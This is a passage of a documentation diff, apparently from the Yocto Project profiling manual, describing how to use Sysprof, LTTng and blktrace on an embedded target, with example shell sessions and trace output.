+ matchbox-termin(1036) open ("/tmp/vte3FS2LW", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600)
+ matchbox-termin(1036) open ("/tmp/vteJMC7LW", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600)
+
+.. _systemtap-documentation:
+
+systemtap Documentation
+-----------------------
+
+The SystemTap language reference can be found here: `SystemTap Language
+Reference <http://sourceware.org/systemtap/langref/>`__
+
+Links to other SystemTap documents, tutorials, and examples can be found
+here: `SystemTap documentation
+page <http://sourceware.org/systemtap/documentation.html>`__
+
+.. _profile-manual-sysprof:
+
+Sysprof
+=======
+
+Sysprof is a very easy to use system-wide profiler that consists of a
+single window with three panes and a few buttons which allow you to
+start, stop, and view the profile from one place.
+
+.. _sysprof-setup:
+
+Sysprof Setup
+-------------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section.
+
+Sysprof is a GUI-based application that runs on the target system. For
+the rest of this document we assume you've ssh'ed to the host and will
+be running Sysprof on the target (you can use the '-X' option to ssh and
+have the Sysprof GUI run on the target but display remotely on the host
+if you want).
+
+.. _sysprof-basic-usage:
+
+Basic Sysprof Usage
+-------------------
+
+To start profiling the system, you simply press the 'Start' button. To
+stop profiling and to start viewing the profile data in one easy step,
+press the 'Profile' button.
+
+Once you've pressed the profile button, the three panes will fill up
+with profiling data:
+
+.. image:: figures/sysprof-copy-to-user.png
+ :align: center
+
+The left pane shows a list of functions and processes. Selecting one of
+those expands that function in the right pane, showing all its callees.
+Note that this caller-oriented display is essentially the inverse of
+perf's default callee-oriented callchain display.
+
+In the screenshot above, we're focusing on ``__copy_to_user_ll()`` and
+looking up the callchain we can see that one of the callers of
+``__copy_to_user_ll`` is sys_read() and the complete callpath between them.
+Notice that this is essentially a portion of the same information we saw
+in the perf display shown in the perf section of this page.
+
+.. image:: figures/sysprof-copy-from-user.png
+ :align: center
+
+Similarly, the above is a snapshot of the Sysprof display of a
+copy-from-user callchain.
+
+Finally, looking at the third Sysprof pane in the lower left, we can see
+a list of all the callers of a particular function selected in the top
+left pane. In this case, the lower pane is showing all the callers of
+``__mark_inode_dirty``:
+
+.. image:: figures/sysprof-callers.png
+ :align: center
+
+Double-clicking on one of those functions will in turn change the focus
+to the selected function, and so on.
+
+.. admonition:: Tying it Together
+
+ If you like sysprof's 'caller-oriented' display, you may be able to
+ approximate it in other tools as well. For example, 'perf report' has
+ the -g (--call-graph) option that you can experiment with; one of the
+ options is 'caller' for an inverted caller-based callgraph display.
+
+.. _sysprof-documentation:
+
+Sysprof Documentation
+---------------------
+
+There doesn't seem to be any documentation for Sysprof, but maybe that's
+because it's pretty self-explanatory. The Sysprof website, however, is
+here: `Sysprof, System-wide Performance Profiler for
+Linux <http://sysprof.com/>`__
+
+LTTng (Linux Trace Toolkit, next generation)
+============================================
+
+.. _lttng-setup:
+
+LTTng Setup
+-----------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section.
+LTTng is run on the target system by ssh'ing to it.
+
+Collecting and Viewing Traces
+-----------------------------
+
+Once you've applied the above commits and built and booted your image
+(you need to build the core-image-sato-sdk image or use one of the other
+methods described in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section), you're ready to start
+tracing.
+
+Collecting and viewing a trace on the target (inside a shell)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+First, from the host, ssh to the target: ::
+
+ $ ssh -l root 192.168.1.47
+ The authenticity of host '192.168.1.47 (192.168.1.47)' can't be established.
+ RSA key fingerprint is 23:bd:c8:b1:a8:71:52:00:ee:00:4f:64:9e:10:b9:7e.
+ Are you sure you want to continue connecting (yes/no)? yes
+ Warning: Permanently added '192.168.1.47' (RSA) to the list of known hosts.
+ root@192.168.1.47's password:
+
+Once on the target, use these steps to create a trace: ::
+
+ root@crownbay:~# lttng create
+ Spawning a session daemon
+ Session auto-20121015-232120 created.
+ Traces will be written in /home/root/lttng-traces/auto-20121015-232120
+
+Enable the events you want to trace (in this case all kernel events): ::
+
+ root@crownbay:~# lttng enable-event --kernel --all
+ All kernel events are enabled in channel channel0
+
+Start the trace: ::
+
+ root@crownbay:~# lttng start
+ Tracing started for session auto-20121015-232120
+
+And then stop the trace after awhile or after running a particular workload that
+you want to trace: ::
+
+ root@crownbay:~# lttng stop
+ Tracing stopped for session auto-20121015-232120
+
+You can now view the trace in text form on the target: ::
+
+ root@crownbay:~# lttng view
+ [23:21:56.989270399] (+?.?????????) sys_geteuid: { 1 }, { }
+ [23:21:56.989278081] (+0.000007682) exit_syscall: { 1 }, { ret = 0 }
+ [23:21:56.989286043] (+0.000007962) sys_pipe: { 1 }, { fildes = 0xB77B9E8C }
+ [23:21:56.989321802] (+0.000035759) exit_syscall: { 1 }, { ret = 0 }
+ [23:21:56.989329345] (+0.000007543) sys_mmap_pgoff: { 1 }, { addr = 0x0, len = 10485760, prot = 3, flags = 131362, fd = 4294967295, pgoff = 0 }
+ [23:21:56.989351694] (+0.000022349) exit_syscall: { 1 }, { ret = -1247805440 }
+ [23:21:56.989432989] (+0.000081295) sys_clone: { 1 }, { clone_flags = 0x411, newsp = 0xB5EFFFE4, parent_tid = 0xFFFFFFFF, child_tid = 0x0 }
+ [23:21:56.989477129] (+0.000044140) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 681660, vruntime = 43367983388 }
+ [23:21:56.989486697] (+0.000009568) sched_migrate_task: { 1 }, { comm = "lttng-consumerd", tid = 1193, prio = 20, orig_cpu = 1, dest_cpu = 1 }
+ [23:21:56.989508418] (+0.000021721) hrtimer_init: { 1 }, { hrtimer = 3970832076, clockid = 1, mode = 1 }
+ [23:21:56.989770462] (+0.000262044) hrtimer_cancel: { 1 }, { hrtimer = 3993865440 }
+ [23:21:56.989771580] (+0.000001118) hrtimer_cancel: { 0 }, { hrtimer = 3993812192 }
+ [23:21:56.989776957] (+0.000005377) hrtimer_expire_entry: { 1 }, { hrtimer = 3993865440, now = 79815980007057, function = 3238465232 }
+ [23:21:56.989778145] (+0.000001188) hrtimer_expire_entry: { 0 }, { hrtimer = 3993812192, now = 79815980008174, function = 3238465232 }
+ [23:21:56.989791695] (+0.000013550) softirq_raise: { 1 }, { vec = 1 }
+ [23:21:56.989795396] (+0.000003701) softirq_raise: { 0 }, { vec = 1 }
+ [23:21:56.989800635] (+0.000005239) softirq_raise: { 0 }, { vec = 9 }
+ [23:21:56.989807130] (+0.000006495) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 330710, vruntime = 43368314098 }
+ [23:21:56.989809993] (+0.000002863) sched_stat_runtime: { 0 }, { comm = "lttng-sessiond", tid = 1181, runtime = 1015313, vruntime = 36976733240 }
+ [23:21:56.989818514] (+0.000008521) hrtimer_expire_exit: { 0 }, { hrtimer = 3993812192 }
+ [23:21:56.989819631] (+0.000001117) hrtimer_expire_exit: { 1 }, { hrtimer = 3993865440 }
+ [23:21:56.989821866] (+0.000002235) hrtimer_start: { 0 }, { hrtimer = 3993812192, function = 3238465232, expires = 79815981000000, softexpires = 79815981000000 }
+ [23:21:56.989822984] (+0.000001118) hrtimer_start: { 1 }, { hrtimer = 3993865440, function = 3238465232, expires = 79815981000000, softexpires = 79815981000000 }
+ [23:21:56.989832762] (+0.000009778) softirq_entry: { 1 }, { vec = 1 }
+ [23:21:56.989833879] (+0.000001117) softirq_entry: { 0 }, { vec = 1 }
+ [23:21:56.989838069] (+0.000004190) timer_cancel: { 1 }, { timer = 3993871956 }
+ [23:21:56.989839187] (+0.000001118) timer_cancel: { 0 }, { timer = 3993818708 }
+ [23:21:56.989841492] (+0.000002305) timer_expire_entry: { 1 }, { timer = 3993871956, now = 79515980, function = 3238277552 }
+ [23:21:56.989842819] (+0.000001327) timer_expire_entry: { 0 }, { timer = 3993818708, now = 79515980, function = 3238277552 }
+ [23:21:56.989854831] (+0.000012012) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 49237, vruntime = 43368363335 }
+ [23:21:56.989855949] (+0.000001118) sched_stat_runtime: { 0 }, { comm = "lttng-sessiond", tid = 1181, runtime = 45121, vruntime = 36976778361 }
+ [23:21:56.989861257] (+0.000005308) sched_stat_sleep: { 1 }, { comm = "kworker/1:1", tid = 21, delay = 9451318 }
+ [23:21:56.989862374] (+0.000001117) sched_stat_sleep: { 0 }, { comm = "kworker/0:0", tid = 4, delay = 9958820 }
+ [23:21:56.989868241] (+0.000005867) sched_wakeup: { 0 }, { comm = "kworker/0:0", tid = 4, prio = 120, success = 1, target_cpu = 0 }
+ [23:21:56.989869358] (+0.000001117) sched_wakeup: { 1 }, { comm = "kworker/1:1", tid = 21, prio = 120, success = 1, target_cpu = 1 }
+ [23:21:56.989877460] (+0.000008102) timer_expire_exit: { 1 }, { timer = 3993871956 }
+ [23:21:56.989878577] (+0.000001117) timer_expire_exit: { 0 }, { timer = 3993818708 }
+ .
+ .
+ .
+
+You can now safely destroy the trace
+session (note that this doesn't delete the trace - it's still there in
+~/lttng-traces): ::
+
+ root@crownbay:~# lttng destroy
+ Session auto-20121015-232120 destroyed at /home/root
+
+Note that the trace is saved in a directory of the same name as returned by
+'lttng create', under the ~/lttng-traces directory (note that you can change this by
+supplying your own name to 'lttng create'): ::
+
+ root@crownbay:~# ls -al ~/lttng-traces
+ drwxrwx--- 3 root root 1024 Oct 15 23:21 .
+ drwxr-xr-x 5 root root 1024 Oct 15 23:57 ..
+ drwxrwx--- 3 root root 1024 Oct 15 23:21 auto-20121015-232120
+
+Collecting and viewing a userspace trace on the target (inside a shell)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For LTTng userspace tracing, you need to have a properly instrumented
+userspace program. For this example, we'll use the 'hello' test program
+generated by the lttng-ust build.
+
+The 'hello' test program isn't installed on the rootfs by the lttng-ust
+build, so we need to copy it over manually. First cd into the build
+directory that contains the hello executable: ::
+
+ $ cd build/tmp/work/core2_32-poky-linux/lttng-ust/2.0.5-r0/git/tests/hello/.libs
+
+Copy that over to the target machine: ::
+
+ $ scp hello root@192.168.1.20:
+
+You now have the instrumented lttng 'hello world' test program on the
+target, ready to test.
+
+First, from the host, ssh to the target: ::
+
+ $ ssh -l root 192.168.1.47
+ The authenticity of host '192.168.1.47 (192.168.1.47)' can't be established.
+ RSA key fingerprint is 23:bd:c8:b1:a8:71:52:00:ee:00:4f:64:9e:10:b9:7e.
+ Are you sure you want to continue connecting (yes/no)? yes
+ Warning: Permanently added '192.168.1.47' (RSA) to the list of known hosts.
+ root@192.168.1.47's password:
+
+Once on the target, use these steps to create a trace: ::
+
+ root@crownbay:~# lttng create
+ Session auto-20190303-021943 created.
+ Traces will be written in /home/root/lttng-traces/auto-20190303-021943
+
+Enable the events you want to trace (in this case all userspace events): ::
+
+ root@crownbay:~# lttng enable-event --userspace --all
+ All UST events are enabled in channel channel0
+
+Start the trace: ::
+
+ root@crownbay:~# lttng start
+ Tracing started for session auto-20190303-021943
+
+Run the instrumented hello world program: ::
+
+ root@crownbay:~# ./hello
+ Hello, World!
+ Tracing... done.
+
+And then stop the trace after awhile or after running a particular workload
+that you want to trace: ::
+
+ root@crownbay:~# lttng stop
+ Tracing stopped for session auto-20190303-021943
+
+You can now view the trace in text form on the target: ::
+
+ root@crownbay:~# lttng view
+ [02:31:14.906146544] (+?.?????????) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 0, intfield2 = 0x0, longfield = 0, netintfield = 0, netintfieldhex = 0x0, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
+ [02:31:14.906170360] (+0.000023816) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 1, intfield2 = 0x1, longfield = 1, netintfield = 1, netintfieldhex = 0x1, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
+ [02:31:14.906183140] (+0.000012780) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 2, intfield2 = 0x2, longfield = 2, netintfield = 2, netintfieldhex = 0x2, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
+ [02:31:14.906194385] (+0.000011245) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 3, intfield2 = 0x3, longfield = 3, netintfield = 3, netintfieldhex = 0x3, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
+ .
+ .
+ .
+
+You can now safely destroy the trace session (note that this doesn't delete the
+trace - it's still there in ~/lttng-traces): ::
+
+ root@crownbay:~# lttng destroy
+ Session auto-20190303-021943 destroyed at /home/root
+
+.. _lltng-documentation:
+
+LTTng Documentation
+-------------------
+
+You can find the primary LTTng Documentation on the `LTTng
+Documentation <https://lttng.org/docs/>`__ site. The documentation on
+this site is appropriate for intermediate to advanced software
+developers who are working in a Linux environment and are interested in
+efficient software tracing.
+
+For information on LTTng in general, visit the `LTTng
+Project <http://lttng.org/lttng2.0>`__ site. You can find a "Getting
+Started" link on this site that takes you to an LTTng Quick Start.
+
+.. _profile-manual-blktrace:
+
+blktrace
+========
+
+blktrace is a tool for tracing and reporting low-level disk I/O.
+blktrace provides the tracing half of the equation; its output can be
+piped into the blkparse program, which renders the data in a
+human-readable form and does some basic analysis:
+
+.. _blktrace-setup:
+
+blktrace Setup
+--------------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`"
+section.
+
+blktrace is an application that runs on the target system. You can run
+the entire blktrace and blkparse pipeline on the target, or you can run
+blktrace in 'listen' mode on the target and have blktrace and blkparse
+collect and analyze the data on the host (see the
+":ref:`profile-manual/profile-manual-usage:Using blktrace Remotely`" section
+below). For the rest of this section we assume you've ssh'ed to the host and
+will be running blkrace on the target.
+
+.. _blktrace-basic-usage:
+
+Basic blktrace Usage
+--------------------
+
+To record a trace, simply run the 'blktrace' command, giving it the name
+of the block device you want to trace activity on: ::
+
+ root@crownbay:~# blktrace /dev/sdc
+
+In another shell, execute a workload you want to trace. ::
+
+ root@crownbay:/media/sdc# rm linux-2.6.19.2.tar.bz2; wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2; sync
+ Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+ linux-2.6.19.2.tar.b 100% \|*******************************\| 41727k 0:00:00 ETA
+
+Press Ctrl-C in the blktrace shell to stop the trace. It
+will display how many events were logged, along with the per-cpu file
+sizes (blktrace records traces in per-cpu kernel buffers and simply
+dumps them to userspace for blkparse to merge and sort later). ::
+
+ ^C=== sdc ===
+ CPU 0: 7082 events, 332 KiB data
+ CPU 1: 1578 events, 74 KiB data
+ Total: 8660 events (dropped 0), 406 KiB data
+
+If you examine the files saved to disk, you see multiple files, one per CPU and
+with the device name as the first part of the filename: ::
+
+ root@crownbay:~# ls -al
+ drwxr-xr-x 6 root root 1024 Oct 27 22:39 .
+ drwxr-sr-x 4 root root 1024 Oct 26 18:24 ..
+ -rw-r--r-- 1 root root 339938 Oct 27 22:40 sdc.blktrace.0
+ -rw-r--r-- 1 root root 75753 Oct 27 22:40 sdc.blktrace.1
+
+To view the trace events, simply invoke 'blkparse' in the directory
+containing the trace files, giving it the device name that forms the
+first part of the filenames: ::
+
+ root@crownbay:~# blkparse sdc
+
+ 8,32 1 1 0.000000000 1225 Q WS 3417048 + 8 [jbd2/sdc-8]
+ 8,32 1 2 0.000025213 1225 G WS 3417048 + 8 [jbd2/sdc-8]
+ 8,32 1 3 0.000033384 1225 P N [jbd2/sdc-8]
+ 8,32 1 4 0.000043301 1225 I WS 3417048 + 8 [jbd2/sdc-8]
+ 8,32 1 0 0.000057270 0 m N cfq1225 insert_request
+ 8,32 1 0 0.000064813 0 m N cfq1225 add_to_rr
+ 8,32 1 5 0.000076336 1225 U N [jbd2/sdc-8] 1
+ 8,32 1 0 0.000088559 0 m N cfq workload slice:150
+ 8,32 1 0 0.000097359 0 m N cfq1225 set_active wl_prio:0 wl_type:1
+ 8,32 1 0 0.000104063 0 m N cfq1225 Not idling. st->count:1
+ 8,32 1 0 0.000112584 0 m N cfq1225 fifo= (null)
+ 8,32 1 0 0.000118730 0 m N cfq1225 dispatch_insert
+ 8,32 1 0 0.000127390 0 m N cfq1225 dispatched a request
+ 8,32 1 0 0.000133536 0 m N cfq1225 activate rq, drv=1
+ 8,32 1 6 0.000136889 1225 D WS 3417048 + 8 [jbd2/sdc-8]
+ 8,32 1 7 0.000360381 1225 Q WS 3417056 + 8 [jbd2/sdc-8]
+ 8,32 1 8 0.000377422 1225 G WS 3417056 + 8 [jbd2/sdc-8]
+ 8,32 1 9 0.000388876 1225 P N [jbd2/sdc-8]
+ 8,32 1 10 0.000397886 1225 Q WS 3417064 + 8 [jbd2/sdc-8]
+ 8,32 1 11 0.000404800 1225 M WS 3417064 + 8 [jbd2/sdc-8]
+ 8,32 1 12 0.000412343 1225 Q WS 3417072 + 8 [jbd2/sdc-8]
+ 8,32 1 13 0.000416533 1225 M WS 3417072 + 8 [jbd2/sdc-8]
+ 8,32 1 14 0.000422121 1225 Q WS 3417080 + 8 [jbd2/sdc-8]
+ 8,32 1 15 0.000425194 1225 M WS 3417080 + 8 [jbd2/sdc-8]
+ 8,32 1 16 0.000431968 1225 Q WS 3417088 + 8 [jbd2/sdc-8]
+ 8,32 1 17 0.000435251 1225 M WS 3417088 + 8 [jbd2/sdc-8]
+ 8,32 1 18 0.000440279 1225 Q WS 3417096 + 8 [jbd2/sdc-8]
+ 8,32 1 19 0.000443911 1225 M WS 3417096 + 8 [jbd2/sdc-8]
+ 8,32 1 20 0.000450336 1225 Q WS 3417104 + 8 [jbd2/sdc-8]
+ 8,32 1 21 0.000454038 1225 M WS 3417104 + 8 [jbd2/sdc-8]
+ 8,32 1 22 0.000462070 1225 Q WS 3417112 + 8 [jbd2/sdc-8]
+ 8,32 1 23 0.000465422 1225 M WS 3417112 + 8 [jbd2/sdc-8]
+ 8,32 1 24 0.000474222 1225 I WS 3417056 + 64 [jbd2/sdc-8]
+ 8,32 1 0 0.000483022 0 m N cfq1225 insert_request
+ 8,32 1 25 0.000489727 1225 U N [jbd2/sdc-8] 1
+ 8,32 1 0 0.000498457 0 m N cfq1225 Not idling. st->count:1
+ 8,32 1 0 0.000503765 0 m N cfq1225 dispatch_insert
+ 8,32 1 0 0.000512914 0 m N cfq1225 dispatched a request
+ 8,32 1 0 0.000518851 0 m N cfq1225 activate rq, drv=2
+ .
+ .
+ .
+ 8,32 0 0 58.515006138 0 m N cfq3551 complete rqnoidle 1
+ 8,32 0 2024 58.516603269 3 C WS 3156992 + 16 [0]
+ 8,32 0 0 58.516626736 0 m N cfq3551 complete rqnoidle 1
+ 8,32 0 0 58.516634558 0 m N cfq3551 arm_idle: 8 group_idle: 0
+ 8,32 0 0 58.516636933 0 m N cfq schedule dispatch
+ 8,32 1 0 58.516971613 0 m N cfq3551 slice expired t=0
+ 8,32 1 0 58.516982089 0 m N cfq3551 sl_used=13 disp=6 charge=13 iops=0 sect=80
+ 8,32 1 0 58.516985511 0 m N cfq3551 del_from_rr
+ 8,32 1 0 58.516990819 0 m N cfq3551 put_queue
+
+ CPU0 (sdc):
+ Reads Queued: 0, 0KiB Writes Queued: 331, 26,284KiB
+ Read Dispatches: 0, 0KiB Write Dispatches: 485, 40,484KiB
+ Reads Requeued: 0 Writes Requeued: 0
+ Reads Completed: 0, 0KiB Writes Completed: 511, 41,000KiB
+ Read Merges: 0, 0KiB Write Merges: 13, 160KiB
+ Read depth: 0 Write depth: 2
+ IO unplugs: 23 Timer unplugs: 0
+ CPU1 (sdc):
+ Reads Queued: 0, 0KiB Writes Queued: 249, 15,800KiB
+ Read Dispatches: 0, 0KiB Write Dispatches: 42, 1,600KiB
+ Reads Requeued: 0 Writes Requeued: 0
+ Reads Completed: 0, 0KiB Writes Completed: 16, 1,084KiB
+ Read Merges: 0, 0KiB Write Merges: 40, 276KiB
+ Read depth: 0 Write depth: 2
+ IO unplugs: 30 Timer unplugs: 1
+
+ Total (sdc):
+ Reads Queued: 0, 0KiB Writes Queued: 580, 42,084KiB
+ Read Dispatches: 0, 0KiB Write Dispatches: 527, 42,084KiB
+ Reads Requeued: 0 Writes Requeued: 0
+ Reads Completed: 0, 0KiB Writes Completed: 527, 42,084KiB
+ Read Merges: 0, 0KiB Write Merges: 53, 436KiB
+ IO unplugs: 53 Timer unplugs: 1
+
+ Throughput (R/W): 0KiB/s / 719KiB/s
+ Events (sdc): 6,592 entries
+ Skips: 0 forward (0 - 0.0%)
+ Input file sdc.blktrace.0 added
+ Input file sdc.blktrace.1 added
+
+The report shows each event that was
+found in the blktrace data, along with a summary of the overall block
+I/O traffic during the run. You can look at the
+`blkparse <http://linux.die.net/man/1/blkparse>`__ manpage to learn the
+meaning of each field displayed in the trace listing.
+
+.. _blktrace-live-mode:
+
+Live Mode
+~~~~~~~~~
+
+blktrace and blkparse are designed from the ground up to be able to
+operate together in a 'pipe mode' where the stdout of blktrace can be
+fed directly into the stdin of blkparse: ::
+
+ root@crownbay:~# blktrace /dev/sdc -o - | blkparse -i -
+
+This enables long-lived tracing sessions
+to run without writing anything to disk, and allows the user to look for
+certain conditions in the trace data in 'real-time' by viewing the trace
+output as it scrolls by on the screen or by passing it along to yet
+another program in the pipeline such as grep which can be used to
+identify and capture conditions of interest.
+
+There's actually another blktrace command that implements the above
+pipeline as a single command, so the user doesn't have to bother typing
+in the above command sequence: ::
+
+ root@crownbay:~# btrace /dev/sdc
+
+Using blktrace Remotely
+~~~~~~~~~~~~~~~~~~~~~~~
+
+Because blktrace traces block I/O and at the same time normally writes
+its trace data to a block device, and in general because it's not really
+a great idea to make the device being traced the same as the device the
+tracer writes to, blktrace provides a way to trace without perturbing
+the traced device at all by providing native support for sending all
+trace data over the network.
+
+To have blktrace operate in this mode, start blktrace on the target
+system being traced with the -l option, along with the device to trace: ::
+
+ root@crownbay:~# blktrace -l /dev/sdc
+ server: waiting for connections...
+
+On the host system, use the -h option to connect to the target system,
+also passing it the device to trace: ::
+
+ $ blktrace -d /dev/sdc -h 192.168.1.43
+ blktrace: connecting to 192.168.1.43
+ blktrace: connected!
+
+On the target system, you should see this: ::
+
+ server: connection from 192.168.1.43
+
+In another shell, execute a workload you want to trace. ::
+
+ root@crownbay:/media/sdc# rm linux-2.6.19.2.tar.bz2; wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2; sync
+ Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+ linux-2.6.19.2.tar.b 100% \|*******************************\| 41727k 0:00:00 ETA
+
+When it's done, do a Ctrl-C on the host system to stop the
+trace: ::
+
+ ^C=== sdc ===
+ CPU 0: 7691 events, 361 KiB data
+ CPU 1: 4109 events, 193 KiB data
+ Total: 11800 events (dropped 0), 554 KiB data
+
+On the target system, you should also see a trace summary for the trace
+just ended: ::
+
+ server: end of run for 192.168.1.43:sdc
+ === sdc ===
+ CPU 0: 7691 events, 361 KiB data
+ CPU 1: 4109 events, 193 KiB data
+ Total: 11800 events (dropped 0), 554 KiB data
+
+The blktrace instance on the host will
+save the target output inside a hostname-timestamp directory: ::
+
+ $ ls -al
+ drwxr-xr-x 10 root root 1024 Oct 28 02:40 .
+ drwxr-sr-x 4 root root 1024 Oct 26 18:24 ..
+ drwxr-xr-x 2 root root 1024 Oct 28 02:40 192.168.1.43-2012-10-28-02:40:56
+
+cd into that directory to see the output files: ::
+
+ $ ls -l
+ -rw-r--r-- 1 root root 369193 Oct 28 02:44 sdc.blktrace.0
+ -rw-r--r-- 1 root root 197278 Oct 28 02:44 sdc.blktrace.1
+
+And run blkparse on the host system using the device name: ::
+
+ $ blkparse sdc
+
+ 8,32 1 1 0.000000000 1263 Q RM 6016 + 8 [ls]
+ 8,32 1 0 0.000036038 0 m N cfq1263 alloced
+ 8,32 1 2 0.000039390 1263 G RM 6016 + 8 [ls]
+ 8,32 1 3 0.000049168 1263 I RM 6016 + 8 [ls]
+ 8,32 1 0 0.000056152 0 m N cfq1263 insert_request
+ 8,32 1 0 0.000061600 0 m N cfq1263 add_to_rr
+ 8,32 1 0 0.000075498 0 m N cfq workload slice:300
+ .
+ .
+ .
+ 8,32 0 0 177.266385696 0 m N cfq1267 arm_idle: 8 group_idle: 0
+ 8,32 0 0 177.266388140 0 m N cfq schedule dispatch
+ 8,32 1 0 177.266679239 0 m N cfq1267 slice expired t=0
+ 8,32 1 0 177.266689297 0 m N cfq1267 sl_used=9 disp=6 charge=9 iops=0 sect=56
+ 8,32 1 0 177.266692649 0 m N cfq1267 del_from_rr
+ 8,32 1 0 177.266696560 0 m N cfq1267 put_queue
+
+ CPU0 (sdc):
+ Reads Queued: 0, 0KiB Writes Queued: 270, 21,708KiB
+ Read Dispatches: 59, 2,628KiB Write Dispatches: 495, 39,964KiB
+ Reads Requeued: 0 Writes Requeued: 0
+ Reads Completed: 90, 2,752KiB Writes Completed: 543, 41,596KiB
+ Read Merges: 0, 0KiB Write Merges: 9, 344KiB
+ Read depth: 2 Write depth: 2
+ IO unplugs: 20 Timer unplugs: 1
+ CPU1 (sdc):
+ Reads Queued: 688, 2,752KiB Writes Queued: 381, 20,652KiB
+ Read Dispatches: 31, 124KiB Write Dispatches: 59, 2,396KiB
+ Reads Requeued: 0 Writes Requeued: 0
+ Reads Completed: 0, 0KiB Writes Completed: 11, 764KiB
+ Read Merges: 598, 2,392KiB Write Merges: 88, 448KiB
+ Read depth: 2 Write depth: 2
+ IO unplugs: 52 Timer unplugs: 0
+
+ Total (sdc):
+ Reads Queued: 688, 2,752KiB Writes Queued: 651, 42,360KiB
+ Read Dispatches: 90, 2,752KiB Write Dispatches: 554, 42,360KiB
+ Reads Requeued: 0 Writes Requeued: 0
+ Reads Completed: 90, 2,752KiB Writes Completed: 554, 42,360KiB
+ Read Merges: 598, 2,392KiB Write Merges: 97, 792KiB
+ IO unplugs: 72 Timer unplugs: 1
+
+ Throughput (R/W): 15KiB/s / 238KiB/s
+ Events (sdc): 9,301 entries
+ Skips: 0 forward (0 - 0.0%)
+
+You should see the trace events and summary just as you would have if you'd run
+the same command on the target.
+
+Tracing Block I/O via 'ftrace'
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+It's also possible to trace block I/O using only
+:ref:`profile-manual/profile-manual-usage:The 'trace events' Subsystem`, which
+can be useful for casual tracing if you don't want to bother dealing with the
+userspace tools.
+
+To enable tracing for a given device, use /sys/block/xxx/trace/enable,
+where xxx is the device name. This for example enables tracing for
+/dev/sdc: ::
+
+ root@crownbay:/sys/kernel/debug/tracing# echo 1 > /sys/block/sdc/trace/enable
+
+Once you've selected the device(s) you want
+to trace, selecting the 'blk' tracer will turn the blk tracer on: ::
+
+ root@crownbay:/sys/kernel/debug/tracing# cat available_tracers
+ blk function_graph function nop
+
+ root@crownbay:/sys/kernel/debug/tracing# echo blk > current_tracer
+
+Execute the workload you're interested in: ::
+
+ root@crownbay:/sys/kernel/debug/tracing# cat /media/sdc/testfile.txt
+
+And look at the output (note here that we're using 'trace_pipe' instead of
+trace to capture this trace - this allows us to wait around on the pipe
+for data to appear): ::
+
+ root@crownbay:/sys/kernel/debug/tracing# cat trace_pipe
+ cat-3587 [001] d..1 3023.276361: 8,32 Q R 1699848 + 8 [cat]
+ cat-3587 [001] d..1 3023.276410: 8,32 m N cfq3587 alloced
+ cat-3587 [001] d..1 3023.276415: 8,32 G R 1699848 + 8 [cat]
+ cat-3587 [001] d..1 3023.276424: 8,32 P N [cat]
+ cat-3587 [001] d..2 3023.276432: 8,32 I R 1699848 + 8 [cat]
+ cat-3587 [001] d..1 3023.276439: 8,32 m N cfq3587 insert_request
+ cat-3587 [001] d..1 3023.276445: 8,32 m N cfq3587 add_to_rr
+ cat-3587 [001] d..2 3023.276454: 8,32 U N [cat] 1
+ cat-3587 [001] d..1 3023.276464: 8,32 m N cfq workload slice:150
+ cat-3587 [001] d..1 3023.276471: 8,32 m N cfq3587 set_active wl_prio:0 wl_type:2
+ cat-3587 [001] d..1 3023.276478: 8,32 m N cfq3587 fifo= (null)
+ cat-3587 [001] d..1 3023.276483: 8,32 m N cfq3587 dispatch_insert
+ cat-3587 [001] d..1 3023.276490: 8,32 m N cfq3587 dispatched a request
+ cat-3587 [001] d..1 3023.276497: 8,32 m N cfq3587 activate rq, drv=1
+ cat-3587 [001] d..2 3023.276500: 8,32 D R 1699848 + 8 [cat]
+
+And this turns off tracing for the specified device: ::
+
+ root@crownbay:/sys/kernel/debug/tracing# echo 0 > /sys/block/sdc/trace/enable
+
+.. _blktrace-documentation:
+
+blktrace Documentation
+----------------------
+
